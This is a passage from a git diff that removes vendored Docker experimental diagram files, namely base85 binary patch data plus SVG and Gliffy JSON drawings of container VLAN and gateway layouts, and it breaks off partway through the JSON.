z-(5!8HguEgP@N24RWa6d`e#;0fe(FSLq%Bx^b6%W3e2L;B^-)861&F4|)pMSa)fA5d%70C71M6))P z@6i^+GmhDfM`)-_;NQtQtm#tp>BTTUxJM5ND88t#K~=eB4*1M?e{-tjjU*7!-i@fI z1OK@F9K%`!K$E_XgkzH6ncXhYx+T$6AO;}gM<%e&Bg)$WXxf1q8@o*ynQp zYOfb;D0%56T7))UhDk!_V{bZDXuC|Hatfm5`Sk|heaUkQ4+GhwK!Ady$P(q>(9pkb zXk=u>^>o|eHA?VUb+Q?^S-X9b&=9V~`K1fl4;eWigu`zNPn6y5&tIe;*}Ov(ut@TM zQG6T}*(ppat0YdXMG1(TCjEyY5rKi}HS#1o;&8mf4~Y}wxFj4D1pp`?RzP^Q*`u1^ z+7CH=y)dE^(W%v>rJTa3etdjF^$1sc`vS!2@rb?P}6)hsEi*@mn$*rsZ z*JfPQrK6anuKW4(vrA?lGMd2=a|$k6h-LJAAtTMlC75cSiZj&6P7!sI%c0aCFCn&_ zaw0M}v%sR}WI`hFLD>DRdboJN4l-IZz@+>2#LXSmU)?JFXaW!aQqmm<)w~WAnW$&8 zO06QprL)YG)PHgvYRjT^Cx2nrbs!rfMl1Wtp(E@8wGf-nc%bO#NzDYpej0D?x4Vl5 z>m)%{(S?aP5eP~xF_48ah}6gc{lcH2I-?jlkMGVt+md@3Yx}V)kSbG6R&v++l4&6SN}?GZ zRdZTx5P5hf?(j7jkpe_LZf8E*#8~F#!JL+s`~$ggf;}>kXtlZ;G5`Fg%3Njq=b<&l zU>uvr=7(hE?<{hSeL-8xBbhI9>Yytcel^R1t$?rf&cX~r`L^i=o=O^IOom_Dd{qUJ zail2X-MQHDJkJBL`vp2MOTG)`p?pgp>l(&y%MI_{_LSQNCk`w3YSyDK0DjbJ@_kjH z;~sf4NKJJ26B_xmzpX--4KG(+W{l;!bSMkmne469Ugk|SEIl8^SpJSU@$a*kq(bN30OYWo%wjL35S$m2|v-vCEV z9;fQiEDv%U61L=z%FBOS5sN7^W_wf@xm}`e6~Qx(V3xYgj5KlI_KNU67`+1Y1GMbU zJCM?69K(%tleG#o%!G9113xSRR8o@6+FDyr)PDtYxdf^ND7r|>3+m2t;eOlHAbwrs zbw8)tp{`?#N>Hy>Vw#I7(z02B0x^N^}%SwYLlWp@+i|) zatj!bQnjjCdTV?pg>rnxS44WT0OEQfm>^wgO2=?0i6_}Y_~e$TTEI%|SPD1@R>bq< zg2`!ar%7_C%Kl<)qLZQSw{jsf^Jc+~V#S-%V{$ng&!1vV3q-tD?feCew$g(`diU5! 
zW=HzyUb}&!#!sNpq;x+tBf*c`0eX-_G$KL-Wq=;r!YaE6?I+d zJP4v zYwZ20rc)i-xvV)D@&Z76bEK3vf9%rU&<65}(H%_@)zH<-)#%-2Dn595eqv$TAnBkM z^?WTC_!ofY$wQ{V_+6uP$VBR2BBM`Sg;4ED@K2Etf1mSu{D-HS(;C?LO{??a92!_V z^fEQ&{q6@vX}el^h4NG4kf=6kDcv)sPjqb5d5K=xaT0#lv=c#($wC>ad^E@~Mm@Gg z*#Dobs?9oLE`6UK;Mo!1-gn+^VhULP-@Na-+)QVz4a;9j(o@sY!kuLImJ|A44rgn` zIu*tSH};M!Wk)1otS&LGhX;^ipQFMHRsVIpn(Nv(l(f-B@=!QB7Ef`Ftz2%qq+RF( z?YerZIHz%hxh0M{&AUy=+ar(f#0%E`)axho@(%&|?>IU;FY$xcE`Odt=|Q8V#;qCF^rc~|!; z$03QC1fa!sN2;rnk3x_e@|#I(4czUYba3DZ(ZWR-w~yzV%!jnS zI=|~Z2r@9^K6cOV9SQpw{wF37N%lAT=kQO~$#=au6eB#p?KtpWTcCmd!iM34ElUM` zT%NWTfA6=o639Q!#xt%X%4G|l@4IemhMEa^QItX%L_qY$Ma<64;qt#U2v=WU9$EjA z9y*uPxeXDO#I3#AAZpSPWa_)nnPJ12t%$=BrW6EHBz%c#iB`PC#H;UpUmx|IqEa}R z7rrqO^$_=QQo2H5f_61(&4qg)TW+IrnFGPhZ{~x4OK4gEcN(vBVXo1T=ck8fCUp6g%z?@m#P*^>KMXZd7=E>JyreSU^X zm&dee)0)ofFnxNm&F9I#?R$;Wa-}&AZ>SGmSY7Xaa?bw=^DkUntS0V%@Z1ESqs_;8 zB%Kt!IXVxTp73@|usNa7{M#zezDcJxbX|GuADdvInV)}7{OoD<@}Bi=_79OW>$m?g z`@eA2+2Y#lhUZV79p>-|Dl~EXVb}it@|S0quN(C$Xw0z|zW3|pzC7=e*S+%Ht15O} z@PGbzli_EFo6LXr8F5J6UioSE_0JD~Z_+CHU^$2X`F*{(@yrtv}nS5&!vBR_42NAzV-A%y8Q(dUenH`-^_q-7HNxz5MeY)8FOa zr*FOXrR@Ixx_i}SR>BV~r~Y)K1J1J{=R9QKWpYm{_9*M9=UPf z#iNJjFFzo6UDuJ@{{7O=r)w`>J9m0ZzP{XlyB||7|J(VuaDhQ-V3hUo-W%6agW2V_ zWJdk46ezQe-oO8ud;g7vb(?Rxn7;qL{e#Wx+}mI`=qZ5}=ncW#H{L8@?Uj_5D>q|nKA5%jk{U=wX7;6)2FF{BBqTqj@vwYd~H*~w%fp*k;|sH>+@1|w*I$?a-V1P zd+48%X}y>+<)EMxODP*S$b{vqQy*sV>MiBYSk->?!91O=^h+_kcTZn8ykpo_c_!IT zX|G7RN!Ox^y1HxWv*+ip+-container1 -vlan10192.168.1.2/24eth0 -802.1qtrunkNetworkRouter (gateway)vlan10 -192.168.1.1/24vlan20172.16.1.1/24vlan3010.1.1.1/16eth0.10eth0.20container2 -vlan20172.16.1.2/24container3 -vlan3010.1.1.2/16eth0.30DockerHost \ No newline at end of file diff --git a/vendor/github.com/docker/docker/experimental/images/vlans-deeper-look.gliffy b/vendor/github.com/docker/docker/experimental/images/vlans-deeper-look.gliffy deleted file mode 100644 index 4d9f2761c4..0000000000 --- 
a/vendor/github.com/docker/docker/experimental/images/vlans-deeper-look.gliffy +++ /dev/null @@ -1 +0,0 @@ -{"contentType":"application/gliffy+json","version":"1.3","stage":{"background":"#FFFFFF","width":566,"height":581,"nodeIndex":500,"autoFit":true,"exportBorder":false,"gridOn":true,"snapToGrid":false,"drawingGuidesOn":false,"pageBreaksOn":false,"printGridOn":false,"printPaper":"LETTER","printShrinkToFit":false,"printPortrait":true,"maxWidth":5000,"maxHeight":5000,"themeData":{"uid":"com.gliffy.theme.beach_day","name":"Beach Day","shape":{"primary":{"strokeWidth":2,"strokeColor":"#00A4DA","fillColor":"#AEE4F4","gradient":false,"dropShadow":false,"opacity":1,"text":{"color":"#004257"}},"secondary":{"strokeWidth":2,"strokeColor":"#CDB25E","fillColor":"#EACF81","gradient":false,"dropShadow":false,"opacity":1,"text":{"color":"#332D1A"}},"tertiary":{"strokeWidth":2,"strokeColor":"#FFBE00","fillColor":"#FFF1CB","gradient":false,"dropShadow":false,"opacity":1,"text":{"color":"#000000"}},"highlight":{"strokeWidth":2,"strokeColor":"#00A4DA","fillColor":"#00A4DA","gradient":false,"dropShadow":false,"opacity":1,"text":{"color":"#ffffff"}}},"line":{"strokeWidth":2,"strokeColor":"#00A4DA","fillColor":"none","arrowType":2,"interpolationType":"quadratic","cornerRadius":0,"text":{"color":"#002248"}},"text":{"color":"#002248"},"stage":{"color":"#FFFFFF"}},"viewportType":"default","fitBB":{"min":{"x":-3,"y":-1.0100878848684474},"max":{"x":566,"y":581}},"printModel":{"pageSize":"a4","portrait":false,"fitToOnePage":false,"displayPageBreaks":false},"objects":[{"x":-5.0,"y":-1.0100878848684474,"rotation":0.0,"id":499,"width":569.0,"height":582.0100878848684,"uid":"com.gliffy.shape.basic.basic_v1.default.group","order":103,"lockAspectRatio":false,"lockShape":false,"children":[{"x":374.0,"y":44.510087884868476,"rotation":0.0,"id":497,"width":145.0,"height":32.0,"uid":"com.gliffy.shape.basic.basic_v1.default.text","order":101,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"
Text","Text":{"overflow":"none","paddingTop":2,"paddingRight":2,"paddingBottom":2,"paddingLeft":2,"outerPaddingTop":6,"outerPaddingRight":6,"outerPaddingBottom":2,"outerPaddingLeft":6,"type":"fixed","lineTValue":null,"linePerpValue":null,"cardinalityType":null,"html":"

Network & other

Docker Hosts

","tid":null,"valign":"middle","vposition":"none","hposition":"none"}},"linkMap":[],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":157.40277777777783,"y":108.18042331083174,"rotation":0.0,"id":492,"width":121.19444444444446,"height":256.03113588084784,"uid":"com.gliffy.shape.basic.basic_v1.default.group","order":99,"lockAspectRatio":false,"lockShape":false,"children":[{"x":-126.13675213675185,"y":31.971494223140525,"rotation":180.0,"id":453,"width":11.1452323717951,"height":61.19357171974171,"uid":"com.gliffy.shape.basic.basic_v1.default.line","order":57,"lockAspectRatio":true,"lockShape":false,"graphic":{"type":"Line","Line":{"strokeWidth":6.0,"strokeColor":"#38761d","fillColor":"#38761d","dashStyle":"1.0,1.0","startArrow":0,"endArrow":0,"startArrowRotation":"auto","endArrowRotation":"auto","interpolationType":"linear","cornerRadius":10.0,"controlPath":[[-121.4915197649562,-156.36606993796556],[-121.49151976495622,-99.52846483047983],[-229.68596420939843,-99.52846483047591],[-229.68596420939843,-34.22088765589871]],"lockSegments":{"1":true},"ortho":true}},"linkMap":[],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":289.82598824786317,"y":137.23816896148608,"rotation":180.0,"id":454,"width":11.1452323717951,"height":61.19357171974171,"uid":"com.gliffy.shape.basic.basic_v1.default.line","order":55,"lockAspectRatio":true,"lockShape":false,"graphic":{"type":"Line","Line":{"strokeWidth":6.0,"strokeColor":"#38761d","fillColor":"#38761d","dashStyle":"1.0,1.0","startArrow":0,"endArrow":0,"startArrowRotation":"auto","endArrowRotation":"auto","interpolationType":"linear","cornerRadius":10.0,"controlPath":[[291.05455395299924,191.93174068122784],[291.05455395299924,106.06051735724502],[186.27677617521402,106.06051735724502],[186.27677617521402,69.78655839914467]],"lockSegments":{},"ortho":true}},"linkMap":[],"hidden":false,"layerId":"9wom3rMkTrb3"}],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":372.0,"y":332.0100878848684,"rotation":0.0,"id":490,"width":144.0,"height":60.0,"uid"
:"com.gliffy.shape.basic.basic_v1.default.group","order":97,"lockAspectRatio":false,"lockShape":false,"children":[{"x":0.0,"y":9.5,"rotation":0.0,"id":365,"width":141.0,"height":40.0,"uid":"com.gliffy.shape.basic.basic_v1.default.text","order":98,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Text","Text":{"overflow":"none","paddingTop":2,"paddingRight":2,"paddingBottom":2,"paddingLeft":2,"outerPaddingTop":6,"outerPaddingRight":6,"outerPaddingBottom":2,"outerPaddingLeft":6,"type":"fixed","lineTValue":null,"linePerpValue":null,"cardinalityType":null,"html":"

 Parent: eth0.30

VLAN: 30

","tid":null,"valign":"middle","vposition":"none","hposition":"none"}},"linkMap":[],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":0.0,"y":0.0,"rotation":0.0,"id":342,"width":144.0,"height":60.0,"uid":"com.gliffy.shape.basic.basic_v1.default.round_rectangle","order":96,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Shape","Shape":{"tid":"com.gliffy.stencil.round_rectangle.basic_v1","strokeWidth":1.0,"strokeColor":"#434343","fillColor":"#eb6c6c","gradient":false,"dashStyle":null,"dropShadow":true,"state":0,"opacity":0.99,"shadowX":4.0,"shadowY":4.0}},"linkMap":[],"children":[],"hidden":false,"layerId":"9wom3rMkTrb3"}],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":52.0,"y":332.0100878848684,"rotation":0.0,"id":489,"width":144.0,"height":60.0,"uid":"com.gliffy.shape.basic.basic_v1.default.group","order":92,"lockAspectRatio":false,"lockShape":false,"children":[{"x":1.0,"y":10.5,"rotation":0.0,"id":367,"width":138.0,"height":40.0,"uid":"com.gliffy.shape.basic.basic_v1.default.text","order":93,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Text","Text":{"overflow":"none","paddingTop":2,"paddingRight":2,"paddingBottom":2,"paddingLeft":2,"outerPaddingTop":6,"outerPaddingRight":6,"outerPaddingBottom":2,"outerPaddingLeft":6,"type":"fixed","lineTValue":null,"linePerpValue":null,"cardinalityType":null,"html":"

Parent: eth0.10

VLAN ID: 10

","tid":null,"valign":"middle","vposition":"none","hposition":"none"}},"linkMap":[],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":0.0,"y":0.0,"rotation":0.0,"id":340,"width":144.0,"height":60.0,"uid":"com.gliffy.shape.basic.basic_v1.default.round_rectangle","order":91,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Shape","Shape":{"tid":"com.gliffy.stencil.round_rectangle.basic_v1","strokeWidth":1.0,"strokeColor":"#434343","fillColor":"#5fcc5a","gradient":false,"dashStyle":null,"dropShadow":true,"state":0,"opacity":0.99,"shadowX":4.0,"shadowY":4.0}},"linkMap":[],"children":[],"hidden":false,"layerId":"9wom3rMkTrb3"}],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":289.40277777777794,"y":126.43727235088903,"rotation":0.0,"id":486,"width":121.19444444444446,"height":250.0,"uid":"com.gliffy.shape.basic.basic_v1.default.group","order":88,"lockAspectRatio":false,"lockShape":false,"children":[{"x":236.18596420940128,"y":158.89044937932732,"rotation":0.0,"id":449,"width":11.1452323717951,"height":59.50782702798556,"uid":"com.gliffy.shape.basic.basic_v1.default.line","order":53,"lockAspectRatio":true,"lockShape":false,"graphic":{"type":"Line","Line":{"strokeWidth":6.0,"strokeColor":"#cc0000","fillColor":"#cc0000","dashStyle":"1.0,1.0","startArrow":0,"endArrow":0,"startArrowRotation":"auto","endArrowRotation":"auto","interpolationType":"linear","cornerRadius":10.0,"controlPath":[[-121.49151976495682,-152.05853787273531],[-121.49151976495682,-81.64750068755309],[-229.68596420940125,-81.64750068755139],[-229.68596420940125,-33.27817949077674]],"lockSegments":{},"ortho":true}},"linkMap":[],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":-179.77677617521388,"y":56.523633779319084,"rotation":0.0,"id":450,"width":11.1452323717951,"height":59.50782702798556,"uid":"com.gliffy.shape.basic.basic_v1.default.line","order":51,"lockAspectRatio":true,"lockShape":false,"graphic":{"type":"Line","Line":{"strokeWidth":6.0,"strokeColor":"#cc0000","fillColor":"#cc0000","dashStyle":"1.0,
1.0","startArrow":0,"endArrow":0,"startArrowRotation":"auto","endArrowRotation":"auto","interpolationType":"linear","cornerRadius":10.0,"controlPath":[[291.0545539529992,186.6444547140887],[291.0545539529992,117.79470574474337],[186.276776175214,117.79470574474337],[186.276776175214,67.8640963321146]],"lockSegments":{"1":true},"ortho":true}},"linkMap":[],"hidden":false,"layerId":"9wom3rMkTrb3"}],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":447.0,"y":150.01008788486848,"rotation":0.0,"id":472,"width":46.99999999999994,"height":27.0,"uid":"com.gliffy.shape.basic.basic_v1.default.group","order":87,"lockAspectRatio":false,"lockShape":false,"children":[{"x":0.0,"y":0.0,"rotation":0.0,"id":473,"width":37.09803921568625,"height":18.000000000000004,"uid":"com.gliffy.shape.basic.basic_v1.default.rectangle","order":86,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Shape","Shape":{"tid":"com.gliffy.stencil.rectangle.basic_v1","strokeWidth":1.0,"strokeColor":"#666666","fillColor":"#4cacf5","gradient":false,"dashStyle":null,"dropShadow":false,"state":0,"opacity":1.0,"shadowX":0.0,"shadowY":0.0}},"linkMap":[],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":5.485490196078445,"y":5.153846153846132,"rotation":0.0,"id":474,"width":37.09803921568625,"height":18.000000000000004,"uid":"com.gliffy.shape.basic.basic_v1.default.rectangle","order":84,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Shape","Shape":{"tid":"com.gliffy.stencil.rectangle.basic_v1","strokeWidth":1.0,"strokeColor":"#666666","fillColor":"#4cacf5","gradient":false,"dashStyle":null,"dropShadow":false,"state":0,"opacity":1.0,"shadowX":0.0,"shadowY":0.0}},"linkMap":[],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":9.901960784313701,"y":9.0,"rotation":0.0,"id":475,"width":37.09803921568625,"height":18.000000000000004,"uid":"com.gliffy.shape.basic.basic_v1.default.rectangle","order":82,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Shape","Shape":{"tid":"com.gliffy.stencil.rectangle.
basic_v1","strokeWidth":1.0,"strokeColor":"#666666","fillColor":"#4cacf5","gradient":false,"dashStyle":null,"dropShadow":false,"state":0,"opacity":1.0,"shadowX":0.0,"shadowY":0.0}},"linkMap":[],"hidden":false,"layerId":"9wom3rMkTrb3"}],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":368.0,"y":101.71008483311067,"rotation":0.0,"id":477,"width":140.0,"height":56.0,"uid":"com.gliffy.shape.basic.basic_v1.default.text","order":80,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Text","Text":{"overflow":"none","paddingTop":2,"paddingRight":2,"paddingBottom":2,"paddingLeft":2,"outerPaddingTop":6,"outerPaddingRight":6,"outerPaddingBottom":2,"outerPaddingLeft":6,"type":"fixed","lineTValue":null,"linePerpValue":null,"cardinalityType":null,"html":"

Gateway 10.1.30.1

  and other containers on the same VLAN/subnet

 

","tid":null,"valign":"middle","vposition":"none","hposition":"none"}},"linkMap":[],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":350.51767083236393,"y":87.47159983339776,"rotation":0.0,"id":478,"width":175.20345848455912,"height":73.0,"uid":"com.gliffy.shape.cisco.cisco_v1.storage.cloud","order":79,"lockAspectRatio":true,"lockShape":false,"graphic":{"type":"Shape","Shape":{"tid":"com.gliffy.stencil.cisco.cisco_v1.storage.cloud","strokeWidth":2.0,"strokeColor":"#333333","fillColor":"#cc0000","gradient":false,"dashStyle":null,"dropShadow":false,"state":0,"opacity":1.0,"shadowX":0.0,"shadowY":0.0}},"linkMap":[],"children":[],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":94.0,"y":155.01008788486848,"rotation":0.0,"id":463,"width":46.99999999999994,"height":27.0,"uid":"com.gliffy.shape.basic.basic_v1.default.group","order":78,"lockAspectRatio":false,"lockShape":false,"children":[{"x":0.0,"y":0.0,"rotation":0.0,"id":464,"width":37.09803921568625,"height":18.000000000000004,"uid":"com.gliffy.shape.basic.basic_v1.default.rectangle","order":77,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Shape","Shape":{"tid":"com.gliffy.stencil.rectangle.basic_v1","strokeWidth":1.0,"strokeColor":"#666666","fillColor":"#4cacf5","gradient":false,"dashStyle":null,"dropShadow":false,"state":0,"opacity":1.0,"shadowX":0.0,"shadowY":0.0}},"linkMap":[],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":5.485490196078445,"y":5.153846153846132,"rotation":0.0,"id":465,"width":37.09803921568625,"height":18.000000000000004,"uid":"com.gliffy.shape.basic.basic_v1.default.rectangle","order":75,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Shape","Shape":{"tid":"com.gliffy.stencil.rectangle.basic_v1","strokeWidth":1.0,"strokeColor":"#666666","fillColor":"#4cacf5","gradient":false,"dashStyle":null,"dropShadow":false,"state":0,"opacity":1.0,"shadowX":0.0,"shadowY":0.0}},"linkMap":[],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":9.901960784313701,"y":9.0,"rotation":0.0,"id":466,"widt
h":37.09803921568625,"height":18.000000000000004,"uid":"com.gliffy.shape.basic.basic_v1.default.rectangle","order":73,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Shape","Shape":{"tid":"com.gliffy.stencil.rectangle.basic_v1","strokeWidth":1.0,"strokeColor":"#666666","fillColor":"#4cacf5","gradient":false,"dashStyle":null,"dropShadow":false,"state":0,"opacity":1.0,"shadowX":0.0,"shadowY":0.0}},"linkMap":[],"hidden":false,"layerId":"9wom3rMkTrb3"}],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":80.0,"y":109.71008483311067,"rotation":0.0,"id":468,"width":140.0,"height":56.0,"uid":"com.gliffy.shape.basic.basic_v1.default.text","order":71,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Text","Text":{"overflow":"none","paddingTop":2,"paddingRight":2,"paddingBottom":2,"paddingLeft":2,"outerPaddingTop":6,"outerPaddingRight":6,"outerPaddingBottom":2,"outerPaddingLeft":6,"type":"fixed","lineTValue":null,"linePerpValue":null,"cardinalityType":null,"html":"

Gateway 10.1.10.1

  and other containers on the same VLAN/subnet

 

","tid":null,"valign":"middle","vposition":"none","hposition":"none"}},"linkMap":[],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":62.51767083236396,"y":95.47159983339776,"rotation":0.0,"id":469,"width":175.20345848455912,"height":73.0,"uid":"com.gliffy.shape.cisco.cisco_v1.storage.cloud","order":70,"lockAspectRatio":true,"lockShape":false,"graphic":{"type":"Shape","Shape":{"tid":"com.gliffy.stencil.cisco.cisco_v1.storage.cloud","strokeWidth":2.0,"strokeColor":"#333333","fillColor":"#38761d","gradient":false,"dashStyle":null,"dropShadow":false,"state":0,"opacity":1.0,"shadowX":0.0,"shadowY":0.0}},"linkMap":[],"children":[],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":341.0,"y":40.010087884868476,"rotation":0.0,"id":460,"width":46.99999999999994,"height":27.0,"uid":"com.gliffy.shape.basic.basic_v1.default.group","order":69,"lockAspectRatio":false,"lockShape":false,"children":[{"x":0.0,"y":0.0,"rotation":0.0,"id":417,"width":37.09803921568625,"height":18.000000000000004,"uid":"com.gliffy.shape.basic.basic_v1.default.rectangle","order":68,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Shape","Shape":{"tid":"com.gliffy.stencil.rectangle.basic_v1","strokeWidth":1.0,"strokeColor":"#666666","fillColor":"#4cacf5","gradient":false,"dashStyle":null,"dropShadow":false,"state":0,"opacity":1.0,"shadowX":0.0,"shadowY":0.0}},"linkMap":[],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":5.485490196078445,"y":5.153846153846132,"rotation":0.0,"id":418,"width":37.09803921568625,"height":18.000000000000004,"uid":"com.gliffy.shape.basic.basic_v1.default.rectangle","order":66,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Shape","Shape":{"tid":"com.gliffy.stencil.rectangle.basic_v1","strokeWidth":1.0,"strokeColor":"#666666","fillColor":"#4cacf5","gradient":false,"dashStyle":null,"dropShadow":false,"state":0,"opacity":1.0,"shadowX":0.0,"shadowY":0.0}},"linkMap":[],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":9.901960784313701,"y":9.0,"rotation":0.0,"id":419,"widt
h":37.09803921568625,"height":18.000000000000004,"uid":"com.gliffy.shape.basic.basic_v1.default.rectangle","order":64,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Shape","Shape":{"tid":"com.gliffy.stencil.rectangle.basic_v1","strokeWidth":1.0,"strokeColor":"#666666","fillColor":"#4cacf5","gradient":false,"dashStyle":null,"dropShadow":false,"state":0,"opacity":1.0,"shadowX":0.0,"shadowY":0.0}},"linkMap":[],"hidden":false,"layerId":"9wom3rMkTrb3"}],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":198.51767083236396,"y":41.471599833397754,"rotation":0.0,"id":459,"width":175.20345848455912,"height":79.73848499971291,"uid":"com.gliffy.shape.basic.basic_v1.default.group","order":62,"lockAspectRatio":false,"lockShape":false,"children":[{"x":17.482329167636067,"y":14.23848499971291,"rotation":0.0,"id":458,"width":140.0,"height":56.0,"uid":"com.gliffy.shape.basic.basic_v1.default.text","order":61,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Text","Text":{"overflow":"none","paddingTop":2,"paddingRight":2,"paddingBottom":2,"paddingLeft":2,"outerPaddingTop":6,"outerPaddingRight":6,"outerPaddingBottom":2,"outerPaddingLeft":6,"type":"fixed","lineTValue":null,"linePerpValue":null,"cardinalityType":null,"html":"

Gateway 10.1.20.1

  and other containers on the same VLAN/subnet

 

","tid":null,"valign":"middle","vposition":"none","hposition":"none"}},"linkMap":[],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":0.0,"y":0.0,"rotation":0.0,"id":330,"width":175.20345848455912,"height":73.0,"uid":"com.gliffy.shape.cisco.cisco_v1.storage.cloud","order":59,"lockAspectRatio":true,"lockShape":false,"graphic":{"type":"Shape","Shape":{"tid":"com.gliffy.stencil.cisco.cisco_v1.storage.cloud","strokeWidth":2.0,"strokeColor":"#333333","fillColor":"#ff9900","gradient":false,"dashStyle":null,"dropShadow":false,"state":0,"opacity":1.0,"shadowX":0.0,"shadowY":0.0}},"linkMap":[],"children":[],"hidden":false,"layerId":"9wom3rMkTrb3"}],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":279.0,"y":129.01008788486848,"rotation":0.0,"id":440,"width":5.0,"height":227.0,"uid":"com.gliffy.shape.basic.basic_v1.default.line","order":49,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Line","Line":{"strokeWidth":6.0,"strokeColor":"#ff9900","fillColor":"#ff9900","dashStyle":"1.0,1.0","startArrow":0,"endArrow":0,"startArrowRotation":"auto","endArrowRotation":"auto","interpolationType":"linear","cornerRadius":null,"controlPath":[[4.000000000000057,-25.08952732449731],[4.000000000000114,176.01117206537933]],"lockSegments":{},"ortho":false}},"linkMap":[],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":56.0,"y":503.0913886978766,"rotation":0.0,"id":386,"width":135.0,"height":20.0,"uid":"com.gliffy.shape.basic.basic_v1.default.text","order":48,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Text","Text":{"overflow":"none","paddingTop":2,"paddingRight":2,"paddingBottom":2,"paddingLeft":2,"outerPaddingTop":6,"outerPaddingRight":6,"outerPaddingBottom":2,"outerPaddingLeft":6,"type":"fixed","lineTValue":null,"linePerpValue":null,"cardinalityType":null,"html":"

Frontend

","tid":null,"valign":"middle","vposition":"none","hposition":"none"}},"linkMap":[],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":62.0,"y":420.0100878848684,"rotation":0.0,"id":381,"width":120.0,"height":74.18803418803415,"uid":"com.gliffy.shape.basic.basic_v1.default.group","order":41,"lockAspectRatio":false,"lockShape":false,"children":[{"x":0.0,"y":0.0,"rotation":0.0,"id":382,"width":102.08955223880598,"height":54.91841491841488,"uid":"com.gliffy.shape.basic.basic_v1.default.round_rectangle","order":44,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Shape","Shape":{"tid":"com.gliffy.stencil.round_rectangle.basic_v1","strokeWidth":1.0,"strokeColor":"#434343","fillColor":"#4cacf5","gradient":false,"dashStyle":null,"dropShadow":true,"state":0,"opacity":0.97,"shadowX":4.0,"shadowY":4.0}},"linkMap":[],"children":[{"x":2.0417910447761187,"y":0.0,"rotation":0.0,"id":383,"width":98.00597014925374,"height":44.0,"uid":null,"order":47,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Text","Text":{"overflow":"none","paddingTop":8,"paddingRight":8,"paddingBottom":8,"paddingLeft":8,"outerPaddingTop":6,"outerPaddingRight":6,"outerPaddingBottom":2,"outerPaddingLeft":6,"type":"fixed","lineTValue":null,"linePerpValue":null,"cardinalityType":null,"html":"

Container(s)

Eth0 10.1.10.0/24

","tid":null,"valign":"middle","vposition":"none","hposition":"none"}},"hidden":false,"layerId":"9wom3rMkTrb3"}],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":8.955223880597016,"y":9.634809634809635,"rotation":0.0,"id":384,"width":102.08955223880598,"height":54.91841491841488,"uid":"com.gliffy.shape.basic.basic_v1.default.round_rectangle","order":42,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Shape","Shape":{"tid":"com.gliffy.stencil.round_rectangle.basic_v1","strokeWidth":1.0,"strokeColor":"#434343","fillColor":"#4cacf5","gradient":false,"dashStyle":null,"dropShadow":true,"state":0,"opacity":0.97,"shadowX":4.0,"shadowY":4.0}},"linkMap":[],"children":[],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":17.910447761194032,"y":19.26961926961927,"rotation":0.0,"id":385,"width":102.08955223880598,"height":54.91841491841488,"uid":"com.gliffy.shape.basic.basic_v1.default.round_rectangle","order":40,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Shape","Shape":{"tid":"com.gliffy.stencil.round_rectangle.basic_v1","strokeWidth":1.0,"strokeColor":"#434343","fillColor":"#4cacf5","gradient":false,"dashStyle":null,"dropShadow":true,"state":0,"opacity":0.97,"shadowX":4.0,"shadowY":4.0}},"linkMap":[],"children":[],"hidden":false,"layerId":"9wom3rMkTrb3"}],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":382.0,"y":420.0100878848684,"rotation":0.0,"id":376,"width":120.0,"height":74.18803418803415,"uid":"com.gliffy.shape.basic.basic_v1.default.group","order":31,"lockAspectRatio":false,"lockShape":false,"children":[{"x":0.0,"y":0.0,"rotation":0.0,"id":377,"width":102.08955223880598,"height":54.91841491841488,"uid":"com.gliffy.shape.basic.basic_v1.default.round_rectangle","order":34,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Shape","Shape":{"tid":"com.gliffy.stencil.round_rectangle.basic_v1","strokeWidth":1.0,"strokeColor":"#434343","fillColor":"#4cacf5","gradient":false,"dashStyle":null,"dropShadow":true,"state":0,"opacity":0.97,"shadowX":4.0,
